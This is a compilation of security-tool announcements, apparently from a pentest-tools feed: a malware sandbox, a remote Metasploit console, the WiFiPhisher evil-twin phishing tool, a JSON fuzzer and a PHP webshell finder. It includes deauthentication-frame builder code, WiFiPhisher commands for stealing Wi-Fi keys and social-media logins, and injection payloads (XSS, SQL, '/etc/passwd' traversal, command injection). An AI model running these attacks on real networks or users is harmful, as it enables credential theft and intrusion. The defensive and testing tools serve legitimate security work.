Noriben – Portable, Simple, Malware Analysis Sandbox

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben not only lets you run malware the way a sandbox does, but also logs system-wide events while you run the malware manually in whatever way is needed to make it execute. For example, it can listen while you run malware that requires particular command-line options, or watch the system as you step through the malware in a debugger. Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no Procmon pre-filtering (though a filter greatly helps), as it contains numerous whitelist entries to reduce unwanted noise from routine system activity.

Cool Features

- If you have a folder of YARA signature files, you can specify it with the --yara option. Every newly created file is scanned against these signatures, with the results shown in the output report.
- If you have a VirusTotal API key, place it in a file named "virustotal.api" (or embed it directly in the script) to auto-submit MD5 file hashes to VT and get the number of detections.
- You can add lists of MD5s to auto-ignore (such as all of your system files). Generate them with md5deep, put them in a text file, and use --hash to read them.
- You can automate the script for sandbox usage. Using -t to set the execution time and --cmd "path\exe" to specify a malware file, you can automatically run malware, copy the results off, and then revert the VM to run a new sample.
- The --generalize feature automatically substitutes absolute paths with Windows environment variables for better IOC development. For example, C:\Users\malware_user\AppData\Roaming\malware.exe is resolved to %AppData%\malware.exe.

Usage:

    --===[ Noriben v1.6 ]===--
    --===[ @bbaskin ]===--

    usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [--hash HASH] [-t TIMEOUT]
                      [--output OUTPUT] [--yara YARA] [--generalize] [--cmd CMD] [-d]

    optional arguments:
      -h, --help            show this help message and exit
      -c CSV, --csv CSV     Re-analyze an existing Noriben CSV file
      -p PML, --pml PML     Re-analyze an existing Noriben PML file
      -f FILTER, --filter FILTER
                            Specify alternate Procmon Filter PMC
      --hash HASH           Specify MD5 file whitelist
      -t TIMEOUT, --timeout TIMEOUT
                            Number of seconds to collect activity
      --output OUTPUT       Folder to store output files
      --yara YARA           Folder containing YARA rules
      --generalize          Generalize file paths to their environment variables.
                            Default: True
      --cmd CMD             Command line to execute (in quotes)
      -d                    Enable debug tracebacks

Download Noriben
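The two post-processing steps described above, path generalization (--generalize) and the MD5 whitelist (--hash), as an added Python 3 example. This is not Noriben's own code; the environment-variable table, the event list and the md5deep-style whitelist are constructed for the demo.

```python
import hashlib

# Constructed environment table standing in for what a Noriben-style tool would read
# from the analysis VM (os.environ on Windows). The values are assumptions for the demo.
SAMPLE_ENV = {
    "SystemRoot": r"C:\Windows",
    "ProgramFiles": r"C:\Program Files",
    "UserProfile": r"C:\Users\malware_user",
    "AppData": r"C:\Users\malware_user\AppData\Roaming",
    "LocalAppData": r"C:\Users\malware_user\AppData\Local",
    "Temp": r"C:\Users\malware_user\AppData\Local\Temp",
}


def generalize_path(path, env=SAMPLE_ENV):
    """Replace the longest matching environment prefix with %VAR% (case-insensitive).

    Longest value first, so %Temp% wins over %LocalAppData%, which wins over %UserProfile%.
    """
    low = path.lower()
    for name, value in sorted(env.items(), key=lambda kv: len(kv[1]), reverse=True):
        prefix = value.rstrip("\\").lower()
        if low == prefix or low.startswith(prefix + "\\"):
            return "%" + name + "%" + path[len(prefix):]
    return path


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def load_hash_whitelist(text):
    """Parse md5deep output ('<md5>  <path>') or bare MD5 digests, one per line."""
    hashes = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        token = line.split()[0].lower()
        if len(token) == 32 and all(c in "0123456789abcdef" for c in token):
            hashes.add(token)
    return hashes


def filter_events(events, whitelist, env=SAMPLE_ENV):
    """Drop file-write events whose content hash is whitelisted; generalize the rest."""
    kept = []
    for ev in events:
        if ev.get("md5", "").lower() in whitelist:
            continue
        kept.append(dict(ev, path=generalize_path(ev["path"], env)))
    return kept


# Constructed sample: three file writes as a Procmon-derived event list would show them.
SAMPLE_EVENTS = [
    {"op": "WriteFile", "path": r"C:\Users\malware_user\AppData\Roaming\malware.exe",
     "md5": md5_hex(b"MZ\x90\x00fake-dropper")},
    {"op": "WriteFile", "path": r"C:\Windows\System32\config\SOFTWARE.LOG1",
     "md5": md5_hex(b"hello")},  # routine OS noise, listed in the whitelist below
    {"op": "WriteFile", "path": r"C:\Users\malware_user\AppData\Local\Temp\drop.tmp",
     "md5": md5_hex(b"second stage")},
]

# Constructed md5deep-style whitelist (md5("hello") = 5d41402abc4b2a76b9719d911017c592).
SAMPLE_WHITELIST = """# generated with: md5deep -r C:\\Windows
5d41402abc4b2a76b9719d911017c592  C:\\Windows\\System32\\config\\SOFTWARE.LOG1
"""

if __name__ == "__main__":
    for ev in filter_events(SAMPLE_EVENTS, load_hash_whitelist(SAMPLE_WHITELIST)):
        print(ev["op"], ev["path"], ev["md5"])
```

Matching is done on the lowercased path because NTFS paths are case-insensitive and Procmon reports them as the caller spelled them; a whitelist keyed on content hashes rather than paths is what lets the same list survive across VM snapshots and user names.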

Link: http://feedproxy.google.com/~r/PentestTools/~3/mrYkk21lOHk/noriben-portable-simple-malware.html

MSF-Remote-Console – A Remote Msfconsole To Connect To The Msfrcpd Server Of Metasploit

A remote msfconsole written in Python 2.7 that connects to Metasploit's msfrpcd server. It lets you keep modules loaded permanently as a daemon on your server, autopwn2 style. Although the tool can drive an msfrpcd server remotely, it is recommended to use it locally over an ssh or mosh shell, because the client does not validate the server's TLS certificate, so a connection across an untrusted network can be intercepted together with the msfrpcd password.

Features

- Optimized delivery and execution of commands.
- All msf commands are available, including ones added in future Metasploit versions: the console passes input through the RPC API instead of reimplementing each command.
- Browse through your command history with the up and down arrow keys.
- Tab completion for system paths.
- It feels like the normal msfconsole.

What does it look like?

    [*] Connecting to server: Host => myDomain.com, Port => 55553, User => msf, Pwd => ***, SSL => True
    [+] Successfully connected
    [*] Console id: 19
    [msfconsole ASCII-art banner]
           =[ metasploit v4.12.22-dev-52b81f3                   ]
    + -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
    + -- --=[ 455 payloads - 39 encoders - 8 nops             ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

    msf >

How do I use it?

    Usage: Main.py [options]

    Options:
      -h, --help            show this help message and exit
      -r RESOURCE, --resource=RESOURCE
                            Path to resource file
      -u USERNAME, --user=USERNAME
                            Username specified on msfrpcd
      -p PASSWORD, --pass=PASSWORD
                            Password specified on msfrpcd
      -s, --ssl             Enable ssl
      -P PORT, --port=PORT  Port to connect to
      -H HOST, --host=HOST  Server ip
      -c, --credentials     Use hardcoded credentials
      -e, --exit            Exit after executing resource script

With the -c option you can use the credentials hardcoded into Main.py; change them so that you don't have to pass the credential parameters every time. Keep in mind that anyone who can read Main.py can then read the msfrpcd password. With the -r option you specify a resource script to load from your computer into the console.

Example: load a resource script using the hardcoded credentials:

    python Main.py -c -r /root/resource/handler/allHandlers.rc

Log in to the msfrpcd server with credentials given on the command line:

    python Main.py --ssl --port 55553 --host 127.0.0.1 --user msf --pass msf

How do I install it?

First you must have Metasploit installed. If you cannot use the installer (for example because you have no graphical environment), use this guide from Rapid7: Setting Up a Metasploit Development Environment.

This installs all needed dependencies:

    git clone https://github.com/allfro/pymetasploit.git pymetasploit
    cd pymetasploit && sudo python setup.py install

Also don't forget to start your msfrpcd server:

    cd metasploit-framework/
    ruby msfrpcd -U msf -P msf -p 55553

It is also a good idea to start and connect to the PostgreSQL database. Change the password in the echo line first; the SQL file is written to and read from the same path so that the postgres user can open it:

    sudo update-rc.d postgresql enable
    sudo service postgresql start
    echo "create database msf; create user msf with password 'password'; grant all privileges on database msf to msf;" > /tmp/createdb_sql.txt
    sudo -u postgres /usr/bin/psql < /tmp/createdb_sql.txt

In Metasploit:

    db_connect msf:password@127.0.0.1/msf

Download MSF-Remote-Console
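What "passing commands through the RPC API" means on the wire, and how a client can keep certificate validation on, as an added Python 3 example. This is not MSF-Remote-Console's or pymetasploit's code; it reflects my understanding of msfrpcd's MessagePack-over-HTTP API (POST to /api/, an auth.login call that returns a temporary token, every later call shaped as [method, token, args...]), which the page itself does not describe. The two server replies are constructed, not captured from a live server, and the network function is never called offline.

```python
import http.client
import ssl
import struct


def msgpack_pack(obj):
    """Minimal MessagePack encoder: nil, bool, str, array, map (what RPC calls need)."""
    if obj is None:
        return b"\xc0"
    if isinstance(obj, bool):
        return b"\xc3" if obj else b"\xc2"
    if isinstance(obj, str):
        data = obj.encode("utf-8")
        if len(data) < 32:
            return bytes([0xA0 | len(data)]) + data
        if len(data) < 256:
            return b"\xd9" + bytes([len(data)]) + data
        return b"\xda" + struct.pack(">H", len(data)) + data
    if isinstance(obj, (list, tuple)):
        head = bytes([0x90 | len(obj)]) if len(obj) < 16 else b"\xdc" + struct.pack(">H", len(obj))
        return head + b"".join(msgpack_pack(v) for v in obj)
    if isinstance(obj, dict):
        head = bytes([0x80 | len(obj)]) if len(obj) < 16 else b"\xde" + struct.pack(">H", len(obj))
        return head + b"".join(msgpack_pack(k) + msgpack_pack(v) for k, v in obj.items())
    raise TypeError("unsupported type %r" % type(obj))


def _count16(buf, i):
    return struct.unpack(">H", buf[i:i + 2])[0], i + 2


def msgpack_unpack(buf, i=0):
    """Decode one value; returns (value, next_offset). Covers the types replies use."""
    t = buf[i]
    i += 1
    if t == 0xC0:
        return None, i
    if t in (0xC2, 0xC3):
        return t == 0xC3, i
    if t & 0xF0 == 0x90 or t == 0xDC:                       # array
        n, i = (t & 0x0F, i) if t != 0xDC else _count16(buf, i)
        items = []
        for _ in range(n):
            v, i = msgpack_unpack(buf, i)
            items.append(v)
        return items, i
    if t & 0xF0 == 0x80 or t == 0xDE:                       # map
        n, i = (t & 0x0F, i) if t != 0xDE else _count16(buf, i)
        items = {}
        for _ in range(n):
            k, i = msgpack_unpack(buf, i)
            items[k], i = msgpack_unpack(buf, i)
        return items, i
    if t & 0xE0 == 0xA0:                                    # fixstr
        n = t & 0x1F
    elif t in (0xD9, 0xC4):                                 # str8 / bin8
        n, i = buf[i], i + 1
    elif t in (0xDA, 0xC5):                                 # str16 / bin16
        n, i = _count16(buf, i)
    else:
        raise ValueError("unsupported msgpack type 0x%02x" % t)
    return buf[i:i + n].decode("utf-8", "replace"), i + n


def build_login(username, password):
    """auth.login is the only call made without a token; the reply carries one."""
    return msgpack_pack(["auth.login", username, password])


def build_call(token, method, *args):
    """Every other method is [method, token, args...]; that uniform shape is why a thin
    client can forward any console.* / module.* method, including ones added later."""
    return msgpack_pack([method, token] + [str(a) for a in args])


def parse_login(body):
    reply, _ = msgpack_unpack(body)
    if not isinstance(reply, dict):
        raise ValueError("unexpected reply %r" % (reply,))
    if reply.get("error"):
        raise RuntimeError(reply.get("error_message", "login failed"))
    if reply.get("result") != "success" or not reply.get("token"):
        raise RuntimeError("login rejected: %r" % (reply,))
    return reply["token"]


def rpc_post(host, port, body, use_ssl=True, ca_file=None):
    """POST one call to msfrpcd's /api/ endpoint (network; not exercised offline).
    Verification stays on: hand msfrpcd's self-signed certificate in as ca_file (or
    tunnel over SSH) rather than disabling checks and sending the password to whoever
    sits in the middle."""
    if use_ssl:
        ctx = ssl.create_default_context(cafile=ca_file)
        if ca_file:
            ctx.check_hostname = False   # pinned to that one cert; its CN will not match
        conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=15)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=15)
    conn.request("POST", "/api/", body, {"Content-Type": "binary/message-pack"})
    return conn.getresponse().read()


# Constructed replies in the shape msfrpcd returns; not captured from a live server.
SAMPLE_OK_REPLY = b"\x82\xa6result\xa7success\xa5token\xb0TEMPdeadbeef1234"
SAMPLE_ERR_REPLY = b"\x82\xa5error\xc3\xaderror_message\xacInvalid User"

if __name__ == "__main__":
    token = parse_login(SAMPLE_OK_REPLY)
    print(token, build_call(token, "console.write", 19, "sessions -l\n"))
```

The console the page describes is essentially console.create, then console.write / console.read in a loop with the token from auth.login; nothing in the client needs to know which commands exist, which is why new Metasploit commands work without a client update.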

Link: http://feedproxy.google.com/~r/PentestTools/~3/oWnlKUxXlVM/msf-remote-console-remote-msfconsole-to.html

WiFiPhisher v1.2 – Automated victim-customized phishing attacks against Wi-Fi clients

Wifiphisher is a security tool that mounts automated, victim-customized phishing attacks against Wi-Fi clients in order to obtain credentials or infect the victims with malware. It is primarily a social engineering attack; unlike other methods, it does not involve any brute forcing. It is an easy way of obtaining credentials from captive portals and third-party login pages (e.g. for social networks) or WPA/WPA2 pre-shared keys. Wifiphisher works on Kali Linux and is licensed under the GPL license.

How it works

After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page. From the victim's perspective, the attack proceeds in three phases:

1. The victim is deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's Wi-Fi devices within range by forging "Deauthenticate" or "Disassociate" packets to disrupt existing associations. This works because these management frames are unauthenticated in classic 802.11; clients and access points that negotiate 802.11w Protected Management Frames discard the forgeries.

2. The victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed.

3. The victim is served a realistic, specially customized phishing page. Wifiphisher runs a minimal web server that responds to HTTP and HTTPS requests. As soon as the victim requests a page from the Internet, Wifiphisher responds with a realistic fake page that asks for credentials or serves malware. The page is crafted specifically for the victim; for example, a page that imitates the router configuration will carry the logos of the victim's router vendor. The tool supports community-built templates for different phishing scenarios.
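Phase 1 in concrete terms, as an added example that is not wifiphisher's own code: it builds 802.11 Deauthentication frames byte by byte and models one jamming burst with the semantics of the -dP, -d and -s options as the option table describes them (the pairing of per-client and broadcast frames is my reading of those descriptions). The addresses are constructed and nothing is transmitted; injection needs a monitor-mode interface and a RadioTap header in front of each frame, which is deliberately left out.

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_FRAME = 7   # "class 3 frame received from non-associated STA", a common deauth reason
FRAME_LEN = 26            # 24-byte 802.11 MAC header + 2-byte reason code fixed field


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_deauth(dst, src, bssid, reason=REASON_CLASS3_FRAME, seq=0):
    """One 802.11 Deauthentication frame (management type 0, subtype 12).

    Frame Control 0x00C0 little-endian = protocol 0, type 0 (mgmt), subtype 0xC, no flags.
    """
    header = struct.pack("<HH", 0x00C0, 0)                   # frame control, duration
    header += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    header += struct.pack("<H", (seq & 0x0FFF) << 4)         # sequence control, fragment 0
    return header + struct.pack("<H", reason)                # reason code


def parse_deauth(frame):
    if len(frame) < FRAME_LEN:
        raise ValueError("frame too short")
    fc, = struct.unpack_from("<H", frame, 0)
    if fc & 0x00FC != 0x00C0:                                # ignore version bits and flags
        raise ValueError("not a deauthentication frame (fc=0x%04x)" % fc)
    return {
        "dst": mac_str(frame[4:10]),
        "src": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
        "reason": struct.unpack_from("<H", frame, 24)[0],
    }


def deauth_burst(ap, clients, packets=1, directed_only=False, skip=()):
    """One jamming burst.

    packets       (-dP): frames sent AP->client and client->AP for each pair
    directed_only (-d):  drop the AP->broadcast frame
    skip          (-s):  MAC addresses that must never be deauthenticated
    """
    skipped = {m.lower() for m in skip}
    frames, seq = [], 0
    for client in clients:
        if client.lower() in skipped:
            continue
        for _ in range(packets):
            frames.append(build_deauth(client, ap, ap, seq=seq))     # AP -> client
            seq += 1
            frames.append(build_deauth(ap, client, ap, seq=seq))     # client -> AP
            seq += 1
    if not directed_only:
        frames.append(build_deauth(BROADCAST, ap, ap, seq=seq))      # AP -> everyone
    return frames


# Constructed addresses for the demo; nothing below is transmitted.
SAMPLE_AP = "00:11:22:33:44:55"
SAMPLE_CLIENTS = ["aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"]

if __name__ == "__main__":
    for f in deauth_burst(SAMPLE_AP, SAMPLE_CLIENTS, packets=2):
        print(parse_deauth(f))
```

The frame carries no cryptographic material at all, which is the whole point: any radio in range can claim to be the access point (addr2/BSSID) and tell a client to leave, or claim to be the client and tell the access point the same.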
[Screenshot: performing the MiTM attack]

Requirements

The following are needed to get the most out of Wifiphisher:

- Kali Linux. Although people have made Wifiphisher work on other distros, Kali Linux is the officially supported distribution, so all new features are primarily tested on this platform.
- One wireless network adapter that supports AP mode. Drivers should support netlink.
- One wireless network adapter that supports Monitor mode and is capable of injection. Again, drivers should support netlink. If a second wireless adapter is not available, you may run the tool with the --nojamming option; this turns off the deauthentication attack, though.

Installation

To install the latest development version, type the following commands:

    git clone https://github.com/sophron/wifiphisher.git  # Download the latest revision
    cd wifiphisher                                          # Switch to the tool's directory
    sudo python setup.py install                            # Install any dependencies (currently hostapd, PyRIC, jinja2)

Alternatively, you can download the latest stable version from the Releases page.

Usage

Run the tool by typing wifiphisher or python bin/wifiphisher (from inside the tool's directory). Run without any options, it finds the right interfaces and interactively asks you to pick the ESSID of the target network (from a list of all ESSIDs in range) as well as a phishing scenario to perform.

    wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade

Use wlan0 for spawning the rogue Access Point and wlan4 for DoS attacks. Select the target network manually from the list and perform the "Firmware Upgrade" scenario. Useful for manually selecting the wireless adapters. The "Firmware Upgrade" scenario is an easy way of obtaining the PSK from a password-protected network.

    wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd

Automatically pick the right interfaces. Target the Wi-Fi with ESSID "CONFERENCE_WIFI" and perform the "Plugin Update" scenario. The Evil Twin will be password-protected with PSK "s3cr3tp4ssw0rd". Useful against networks with disclosed PSKs (e.g. at conferences). The "Plugin Update" scenario provides an easy way of getting victims to download malicious executables (e.g. malware containing a reverse shell payload).

    wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login

Do not target any network. Simply spawn an open Wi-Fi network with ESSID "FREE WI-FI" and perform the "OAuth Login" scenario. Useful against victims in public areas. The "OAuth Login" scenario provides a simple way of capturing credentials from social networks, like Facebook.

The following are all the options along with their descriptions (also available with wifiphisher -h):

    -h, --help
        Show this help message and exit.
    -s SKIP, --skip SKIP
        Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA
    -jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
        Manually choose an interface that supports monitor mode for deauthenticating the victims. Example: -jI wlan1
    -aI APINTERFACE, --apinterface APINTERFACE
        Manually choose an interface that supports AP mode for spawning an AP. Example: -aI wlan0
    -t TIMEINTERVAL, --timeinterval TIMEINTERVAL
        Choose the time interval between DEAUTH packets being sent.
    -dP DEAUTHPACKETS, --deauthpackets DEAUTHPACKETS
        Choose the number of packets to send in each deauth burst. Default value is 1: 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -dP 2
    -d, --directedonly
        Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs.
    -nJ, --nojamming
        Skip the deauthentication phase. When this option is used, only one wireless interface is required.
    -e ESSID, --essid ESSID
        Enter the ESSID of the rogue Access Point. This option skips the Access Point selection phase. Example: --essid 'Free WiFi'
    -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
        Choose the phishing scenario to run. This option skips the scenario selection phase. Example: -p firmware_upgrade
    -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
        Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd

Screenshots

- Targeting an access point
- A successful attack
- Fake router configuration page
- Fake OAuth Login page
- Fake web-based network manager

Disclaimer

The authors do not own the logos under the wifiphisher/data/ directory. Copyright Disclaimer: under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research.

Usage of Wifiphisher for attacking infrastructures without prior mutual consent can be considered an illegal activity. It is the end user's responsibility to obey all applicable local, state and federal laws. The authors assume no liability and are not responsible for any misuse or damage caused by this program.

Download WiFiPhisher

Link: http://feedproxy.google.com/~r/PentestTools/~3/8kXzbT6EXPI/wifiphisher-v12-automated-victim.html

PyJFuzz – Python JSON Fuzzer

PyJFuzz is a small, extensible and ready-to-use framework for fuzzing JSON inputs, such as mobile-endpoint REST APIs, JSON implementations, browsers, CLI executables and much more.

Version: 1.1.0
Homepage: http://www.mseclab.com/
Github: https://github.com/mseclab/PyJFuzz
Author: Daniele Linguaglossa (@dzonerzy)
License: MIT (see LICENSE file)

Installation

Dependencies: PyJFuzz needs a single dependency, bottle, which the setup.py installation pulls in automatically.

You can install PyJFuzz with the following command:

    git clone https://github.com/mseclab/PyJFuzz.git && cd PyJFuzz && sudo python setup.py install

Documentation and Examples

CLI tool: once installed, PyJFuzz provides both a Python library and a command-line utility called pjf (screenshot below).

Library: PyJFuzz can also be used as a library; import it into your project as follows:

    from pyjfuzz.lib import *

Classes

The available objects/classes are:

- PJFServer: used to start and stop the built-in HTTP and HTTPS servers.
- PJFProcessMonitor: monitors a process for crashes and automatically restarts it each time it crashes.
- PJFTestcaseServer: used in conjunction with PJFProcessMonitor; whenever a process crashes, the testcase server registers and stores the JSON that caused the crash.
- PJFFactory: the main object that does the actual fuzzing of JSON objects.
- PJFConfiguration: the configuration object for each of the available classes.
- PJFExternalFuzzer: used by PJFFactory; an auxiliary class that provides an interface to other command-line fuzzers such as radamsa.
- PJFMutation: used by PJFFactory; provides all the mutations used during a fuzzing session.
- PJFExecutor: provides an interface for interacting with external processes.

Examples

Some trivial examples of how to write a PyJFuzz-powered program (Python 2, like the project itself):

simple_fuzzer.py

    from argparse import Namespace
    from pyjfuzz.lib import *

    config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6))
    fuzzer = PJFFactory(config)
    while True:
        print fuzzer.fuzzed  # a fresh test case on every access

simple_server.py

    from argparse import Namespace
    from pyjfuzz.lib import *

    config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, debug=True, indent=True))
    PJFServer(config).run()

Sometimes you may need to modify settings that are not exposed as options, such as the HTTP or HTTPS server port. This can be done as follows:

    from argparse import Namespace
    from pyjfuzz.lib import *

    config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, indent=True))
    print config.ports["servers"]["HTTP_PORT"]   # 8080
    print config.ports["servers"]["HTTPS_PORT"]  # 8443
    print config.ports["servers"]["TCASE_PORT"]  # 8888
    config.ports["servers"]["HTTPS_PORT"] = 443  # Change HTTPS port to 443

Remember: when changing the default ports, always handle the exception raised when binding requires privileges (ports below 1024 need root).

Below is a comprehensive list of all available settings of the PJFConfiguration object:

Configuration table

    Name          Type        Description
    json          dict        JSON object to fuzz
    json_file     str         Path to a JSON file
    parameters    list        List of parameters to fuzz (taken from the JSON object)
    techniques    list<int>   List of polyglot attacks used to generate fuzzed JSON (XSS, LFI, etc.),
                              in the range 0-13 (see the techniques table)
    level         int         Fuzzing level in the range 0-6
    utf8          bool        If true, switch from unicode encoding to pure byte representation
    indent        bool        Whether to indent the result object
    url_encode    bool        Whether to URL-encode the result object
    strong_fuzz   bool        Whether to use strong fuzzing (does not maintain JSON structure;
                              useful for parser fuzzing)
    debug         bool        Whether to enable debug prints
    exclude       bool        Exclude from fuzzing the parameters selected by the parameters option
    notify        bool        Whether to notify the process monitor when a crash occurs;
                              only used with PJFServer
    html          str         Path to an HTML directory to serve within PJFServer
    ext_fuzz      bool        Whether to use the binary from "command" as an external fuzzer
    cmd_fuzz      bool        Whether to use the binary from "command" as the fuzzer target
    content_type  str         Content type returned by PJFServer (default application/json)
    command       list<str>   Command to execute; each argument is a list element
                              (shlex.split from Python can build it)

Techniques table

    Index  Description
    0      XSS injection (polyglot)
    1      SQL injection (polyglot)
    2      LFI attack
    3      SQL injection polyglot (2)
    4      XSS injection (polyglot) (2)
    5      RCE injection (polyglot)
    6      LFI attack (2)
    7      Data URI attack
    8      LFI and HREF attack
    9      Header injection
    10     RCE injection (polyglot) (2)
    11     Generic template injection
    12     Flask template injection
    13     Random character attack

Screenshots

[Screenshots of the pjf command-line tool, showing what to expect from PyJFuzz]

Built-in tool

PyJFuzz ships with a built-in tool called PyJFuzz Web Fuzzer. It provides an automatic fuzzing console via the HTTP and HTTPS servers, and can be used to fuzz almost any web browser easily, even when you cannot control the process state. Two switches launch this tool, --browser-auto and --fuzz-web: the first restarts the browser automatically when a crash occurs, the second tries to detect when a browser stops making requests. Both of them always save the test cases.

End

Thanks for using PyJFuzz! Happy fuzzing from mseclab.

Download PyJFuzz
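What a structure-preserving JSON fuzzer with the knobs from the configuration table (level, parameters/exclude, techniques, strong_fuzz) looks like in practice, as an added Python 3 example. This is not PyJFuzz's own code, and the payload strings under TECHNIQUES are this example's own rather than the project's polyglots; the index numbers are kept only for familiarity with the techniques table.

```python
import json
import random

# Payloads in the spirit of the techniques table (indices kept for familiarity); the
# strings themselves are this example's own, not PyJFuzz's.
TECHNIQUES = {
    0: "\"'><svg/onload=alert(1)>",       # XSS polyglot
    1: "' OR '1'='1' -- ",                # SQL injection
    2: "../../../../etc/passwd%00",       # LFI
    5: ";`id`;$(id)|id",                  # RCE
    11: "{{7*7}}${7*7}<%= 7*7 %>",        # generic template injection
}
BOUNDARY_INTS = [0, -1, 2**31 - 1, -2**31, 2**63, 2**64 - 1, 10**20]


class JsonFuzzer:
    """Structure-preserving JSON fuzzer: keys and nesting are kept, leaves are mutated.

    level (0-6): fraction of selected leaves mutated per round, 6 = all of them.
    parameters / exclude: fuzz only these keys, or every key but these.
    strong_fuzz: mangle the serialized text instead, which is what parser fuzzing needs.
    """

    def __init__(self, doc, level=6, techniques=None, parameters=None,
                 exclude=False, strong_fuzz=False, seed=None):
        self.doc = doc
        self.level = max(0, min(6, level))
        self.payloads = [TECHNIQUES[t] for t in (techniques or sorted(TECHNIQUES))]
        self.parameters = set(parameters or [])
        self.exclude = exclude
        self.strong_fuzz = strong_fuzz
        self.rng = random.Random(seed)

    def _selected(self, key):
        if not self.parameters:
            return True
        return (key not in self.parameters) if self.exclude else (key in self.parameters)

    def _mutate_leaf(self, value):
        if isinstance(value, bool):           # before int: bool is an int subclass
            return self.rng.choice([not value, "true", None, 0 if value else 1])
        if isinstance(value, int):
            return self.rng.choice(BOUNDARY_INTS + [-value, str(value)])
        if isinstance(value, float):
            return self.rng.choice([1e308, -1e308, 5e-324, 0.0, str(value)])
        if isinstance(value, str):
            payload = self.rng.choice(self.payloads)
            return self.rng.choice([payload, value + payload, payload * 64, ""])
        return value                          # null stays null

    def _walk(self, node, key=None):
        if isinstance(node, dict):
            return {k: self._walk(v, k) for k, v in node.items()}
        if isinstance(node, list):
            return [self._walk(item, key) for item in node]
        if self._selected(key) and self.rng.random() < self.level / 6.0:
            return self._mutate_leaf(node)
        return node

    def _strong(self, text):
        """Attack the grammar itself: drop, inject or duplicate structural characters."""
        chars = list(text)
        for _ in range(1 + self.level):
            op = self.rng.choice(("drop", "inject", "dup"))
            pos = self.rng.randrange(len(chars)) if chars else 0
            if op == "drop" and chars:
                del chars[pos]
            elif op == "inject":
                chars.insert(pos, self.rng.choice('{}[]",:\\\x00'))
            elif chars:
                chars[pos:pos] = chars[pos:pos + 8]
        return "".join(chars)

    @property
    def fuzzed(self):
        """A fresh test case on every access, mirroring the fuzzer.fuzzed usage above."""
        text = json.dumps(self._walk(self.doc))
        return self._strong(text) if self.strong_fuzz else text


def fuzz_structured(doc, **options):
    """One structure-preserving round, parsed back so callers can inspect it."""
    return json.loads(JsonFuzzer(doc, **options).fuzzed)


if __name__ == "__main__":
    fuzzer = JsonFuzzer({"test": ["1", 2, True]}, level=6, seed=1)
    for _ in range(3):
        print(fuzzer.fuzzed)
```

Keeping the structure intact is what makes the output reach application code at all: a REST endpoint rejects malformed JSON in its parser long before the injected string meets a SQL query or a template engine. The strong_fuzz mode gives up that property on purpose, because there the parser is the target.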

Link: http://feedproxy.google.com/~r/PentestTools/~3/Sav7YMqS32A/pyjfuzz-python-json-fuzzer.html

BackdoorMan – Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells

A Python open-source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination; it automates the detection process.

Purpose

The main purpose of BackdoorMan is to help web-masters and developers discover malicious scripts in their site files, because it is quite common for attackers to place a back-door on a site they have compromised. A back-door gives the attacker continued access to the site even if the site owners change account passwords. Back-door scripts vary from hundreds of lines of code to one or two lines, and can be hidden among hundreds of files, which makes them very hard to discover, especially while the back-door is inactive. There are common ways and tools for this, grep included, but BackdoorMan automates the whole process and makes it easier (at least, that is the hope).

Features

- Shell detection by filename, using a shell signature database.
- Recognition of web back-doors.
- Detection of suspicious PHP functions and activities.
- Use of external services alongside its own checks:
  - nimbusec shellray API (free online webshell detection for PHP files, https://shellray.com): very high recognition rate for webshells; checks suspicious PHP files online; easy, fast and reliable; classifies webshells by behavior; a free service of nimbusec.
  - VirusTotal Public API (free online service that analyzes files and facilitates quick detection of viruses, worms, trojans and all kinds of malware), useful in this situation.
  - UnPHP (the online PHP decoder, www.unphp.net, a free service for analyzing obfuscated and malicious PHP code), very useful in this situation: eval + gzinflate + base64, recursive de-obfuscation, custom function and regex support.

Requirements

- requests module

Version: v2.3.1
Author: Yassine Addi

Usage

    Usage: BackdoorMan [options] destination1 [destination2 ...]

    A toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination.
    Author: Yassine Addi.
    NOTE: This tool does not require an Internet connection, but one is highly recommended to benefit from all features.

    Options:
      --version             show program's version number and exit
      -h, --help            show this help message and exit
      -o OUTPUT, --output=OUTPUT
                            save output in a file
